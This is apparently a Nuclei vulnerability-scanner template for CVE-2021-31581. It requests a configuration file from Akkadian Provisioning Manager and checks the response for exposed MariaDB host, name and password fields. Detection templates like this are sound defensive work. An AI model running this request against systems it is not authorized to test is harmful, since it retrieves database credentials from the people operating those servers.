28 lines
672 B
YAML
28 lines
672 B
YAML
id: CVE-2021-31581
|
|
|
|
info:
|
|
name: Akkadian Provisioning Manager MariaDB Credentials
|
|
author: geeknik
|
|
reference:
|
|
- https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
|
|
- https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
|
|
severity: medium
|
|
tags: cve,cve2021,akkadian,mariadb,disclosure
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pme/database/pme/phinx.yml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "host:"
|
|
- "name:"
|
|
- "pass:"
|
|
condition: and
|